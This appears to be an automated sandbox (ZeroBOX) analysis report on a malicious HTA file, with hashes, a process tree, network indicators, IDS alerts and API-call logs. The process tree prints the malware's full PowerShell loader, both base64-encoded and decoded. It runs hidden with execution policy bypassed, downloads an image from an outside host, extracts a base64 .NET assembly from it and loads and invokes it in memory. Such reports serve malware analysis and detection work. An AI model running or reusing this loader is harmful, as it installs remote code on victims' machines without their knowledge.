Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Nov. 28, 2023, 9:54 a.m.	Nov. 28, 2023, 9:56 a.m.

Size	394.4KB
Type	HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`dba4ee200dd745d57b7bb1f6dcdfe8d5`
SHA256	`1c8c75968fcfc60ded608007aab7e5b3e4a852eb7d9ccbc316315de14a681bfb`
CRC32	`D25B2384`
ssdeep	`1536:hZzQoSntlf0UdJpJpxRBbsL0UdJpJpxRBbhXZg6xQK8APyLKfcRVjL7hgWD8VFGD:ZePKQDDFo2CmxgR2l`
Yara	Antivirus - Contains references to security software

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\File_HTA.hta.html
2172
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2172 CREDAT:145409
  2260
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8ATQBlAFsANABdACsAJABwAFMASABvAG0AZQBbADMANABdACsAJwBYACcAKQAgACgAIAAoACgAJwB7ADEAfQBpAG0AYQAnACsAJwBnAGUAVQByAGwAIAA9ACAAewAwAH0AaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANgA2ADcALwA2ADAAOAAvAG8AJwArACcAcgBpAGcAaQBuAGEAbAAvAGgAdABhAC4AagBwAGcAPwAxADcAMAAwADIANgA4ADgANAAwAHsAMAB9ADsAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AHsAMQB9AGkAbQBhAGcAJwArACcAZQBCAHkAdABlAHMAIAA9ACAAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAHsAMQB9AGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAewAxAH0AaQBtAGEAZwBlAEIAeQAnACsAJwB0AGUAcwApADsAewAxAH0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAewAwAH0APAAnACsAJwA8AEIAQQBTAEUANgA0AF8AUwBUAEEAJwArACcAUgBUAD4APgB7ADAAfQA7AHsAMQB9AGUAbgBkAEYAbABhAGcAIAA9ACAAewAwAH0APAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHsAMAB9ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAB7ADEAfQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwApADsAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAHsAMQB9AGUAbgBkAEYAbABhAGcAKQA7AHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACcAKwAnAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwB7ADEAfQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAB7ADEAfQBlAG4AZABJAG4AZABlAHgAIAAtACAAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AHsAMQB9AGIAYQAnACsAJwBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAewAxAH0AaQBtACcAKwAnAGEAZwBlAFQAZQB4AHQAJwArACcALgAnACsAJwBTAHUAYgBzAHQAcgBpAG4AZwAoAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgALAAgAHsAMQB9AGIAYQBzAGUANgA0AEwAZQAnACsAJwBuAGcAdABoACkAOwB7ADEAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAJwArACcAeQBzAHQAZQAnACsAJwBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAewAxAH0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAB7ADEAfQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAewAxAH0AdAB5AHAAZQAgAD0AIAB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAewAwAH0ARgBpAGIAZQByAC4ASABvAG0AZQB7ADAAfQApADsAewAxAH0AbQBlAHQAaABvAGQAIAA9ACAAewAxAH0AdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAewAwAH0AVgBBAEkAewAwAH0AKQAuAEkAbgB2AG8AawBlACgAewAxAH0AbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAewAwAH0AZABIAGgAMABMAG0AdABqAGEAWABCAG8AZABHACcAKwAnADkAdgBkAEMAOAB3AE0AegBFAHUATwBEAFEAeQBMAGoASQA1AEwAagBFADUATAB5ADgANgBjAEgAUgAwAGEAQQA9AD0AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAAnACsAJwB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZAAnACsAJwBmAGQAZgB7ADAAfQAgACwAIAB7ADAAJwArACcAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACkAJwApACAALQBGACAAIABbAGMASABBAFIAXQAzADkALABbAGMASABBAFIAXQAzADYAKQApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    1220
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PShOMe[4]+$pSHome[34]+'X') ( (('{1}ima'+'geUrl = {0}https://uploaddeimagens.com.br/images/004/667/608/o'+'riginal/hta.jpg?1700268840{0};{1}webClient = New-Object System.Net.WebClient;{1}imag'+'eBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding]::UTF8.GetString({1}imageBy'+'tes);{1}startFlag = {0}<'+'<BASE64_STA'+'RT>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += '+'{1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}ba'+'se64Command = {1}im'+'ageText'+'.'+'Substring({1}startIndex, {1}base64Le'+'ngth);{1}'+'c'+'ommandBytes = [S'+'yste'+'m.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]::Load({1}commandBytes);{1}type = {1}loadedAssembly.GetType({0}Fiber.Home{0});{1}method = {1}type.GetMethod({0}VAI{0}).Invoke({1}null, [object[]] ({0}dHh0LmtjaXBodG'+'9vdC8wMzEuODQyLjI5LjE5Ly86cHR0aA=={0} , {0}dfdfd{0'+'} , {0}dfdf{0} , {0}d'+'fdf{0} , {0'+'}dadsa{0} , {0}de{0} , {0}cu{0}))') -F [cHAR]39,[cHAR]36))"
      2164

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18	23.62.106.107
uploaddeimagens.com.br	A 104.21.45.138 A 172.67.215.45	104.21.45.138

IP Address	Status	Action
104.21.45.138	Active	Moloch
117.18.232.200	Active	Moloch
121.254.136.9	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49171 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49172 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.102:49173	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49176 -> 104.21.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49176 104.21.45.138:443	C=US, O=Let's Encrypt, CN=E1	CN=uploaddeimagens.com.br	d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 28, 2023, 9:48 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 28, 2023, 9:48 a.m.			0	0
IsDebuggerPresent Nov. 28, 2023, 9:48 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Nov. 28, 2023, 9:49 a.m.	buffer: False console_handle: 0x000000000000039f	1	1	0

Uses Windows APIs to generate a cryptographic key (50 out of 84 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000031f9e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7e4770 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7e4770 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7e4770 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff440 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff440 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff520 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff520 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff520 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff520 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff830 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff830 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ff830 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7e4930 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7e4930 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7e4930 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ffc90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ffc90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ffc90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ffc90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ffc90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ffc90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ffc90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ffc90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7fffa0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7fffa0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7fffa0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b800010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b800010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b800080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b800080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8000f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8000f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8000f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8281e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8281e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8281e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8281e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b828b80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b828b80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003b6430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b493210 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b493210 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b493210 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b4931a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b4931a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b493670 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b493670 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b493670 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 28, 2023, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b493670 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 28, 2023, 9:48 a.m.		1	1	0

Powershell script has download & invoke calls (1 event)

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Nov. 28, 2023, 9:55 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda5a49d registers.r14: 0 registers.r15: 0 registers.rcx: 106226480 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 106232432 registers.r11: 106228240 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1902736312 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Nov. 28, 2023, 9:55 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda5a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 106226480
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 106232432
registers.r11: 106228240
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1902736312
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (2 events)

request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c

Allocates read-write-execute memory (usually to unpack itself) (50 out of 432 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 region_size: 6950912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002ba0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
